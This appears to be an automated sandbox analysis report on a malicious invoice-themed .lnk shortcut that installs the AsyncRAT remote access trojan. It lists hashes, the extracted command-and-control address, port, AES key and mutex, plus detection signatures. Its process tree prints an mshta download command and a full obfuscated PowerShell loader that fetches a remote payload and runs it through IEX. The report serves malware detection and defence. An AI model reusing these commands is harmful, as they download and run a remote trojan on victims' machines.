Analysis
-
max time kernel
62s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24-07-2021 11:04
Static task
static1
Behavioral task
behavioral1
Sample
Invoice#333210.lnk
Resource
win7v20210410
General
-
Target
Invoice#333210.lnk
-
Size
1KB
-
MD5
fd00b923c37b36bfda9a7d78e370f4fc
-
SHA1
a2f41a4e6f6778b8232054531f58aa083bcc455b
-
SHA256
9d5eef4b39df0149096f70bde04f9704e0740e93b1f7911d1ad7a79fb7918cf8
-
SHA512
b010dae295e3b2a25e158ff2b99d22c762d4b0f3fec6d8eb1a64b63946d7b6852254f955d7a377d40b4e77761b7a9017c8e1e0025b618be5eb49dde8834042c9
Malware Config
Extracted
https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt
Extracted
https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt
Extracted
asyncrat
0.5.7B
103.147.184.73:7920
AsyncMutex_6SI8OkPnk
-
aes_key
1DM6U4ipQ53iwuPgxDRkDV4Ly78xKAPF
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
103.147.184.73
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
7920
-
version
0.5.7B
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2728-143-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/2728-144-0x000000000040C71E-mapping.dmp asyncrat -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exeflow pid process 9 2352 mshta.exe 11 2352 mshta.exe 13 2352 mshta.exe 18 2232 powershell.exe 24 2232 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 2232 set thread context of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 set thread context of 2608 2232 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
aspnet_compiler.exepid process 2608 aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2232 powershell.exe 2232 powershell.exe 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 2728 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exemshta.exepowershell.exedescription pid process target process PID 2752 wrote to memory of 2352 2752 cmd.exe mshta.exe PID 2752 wrote to memory of 2352 2752 cmd.exe mshta.exe PID 2352 wrote to memory of 2232 2352 mshta.exe powershell.exe PID 2352 wrote to memory of 2232 2352 mshta.exe powershell.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2728 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe PID 2232 wrote to memory of 2608 2232 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice#333210.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious behavior: AddClipboardFormatListener
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2232-116-0x0000000000000000-mapping.dmp
-
memory/2232-121-0x00000173F3D80000-0x00000173F3D81000-memory.dmpFilesize
4KB
-
memory/2232-124-0x00000173F3F30000-0x00000173F3F31000-memory.dmpFilesize
4KB
-
memory/2232-129-0x00000173F3D70000-0x00000173F3D72000-memory.dmpFilesize
8KB
-
memory/2232-130-0x00000173F3D73000-0x00000173F3D75000-memory.dmpFilesize
8KB
-
memory/2232-131-0x00000173F3D76000-0x00000173F3D78000-memory.dmpFilesize
8KB
-
memory/2232-142-0x00000173F3F00000-0x00000173F3F0E000-memory.dmpFilesize
56KB
-
memory/2352-114-0x0000000000000000-mapping.dmp
-
memory/2608-154-0x0000000005260000-0x0000000005261000-memory.dmpFilesize
4KB
-
memory/2608-148-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/2608-149-0x0000000000402DAE-mapping.dmp
-
memory/2608-156-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/2608-157-0x0000000004DA0000-0x0000000004DA1000-memory.dmpFilesize
4KB
-
memory/2608-158-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/2728-144-0x000000000040C71E-mapping.dmp
-
memory/2728-143-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2728-159-0x00000000010D0000-0x00000000010D1000-memory.dmpFilesize
4KB
-
memory/2728-160-0x0000000005A50000-0x0000000005A51000-memory.dmpFilesize
4KB
-
memory/2728-162-0x0000000005AF0000-0x0000000005AF1000-memory.dmpFilesize
4KB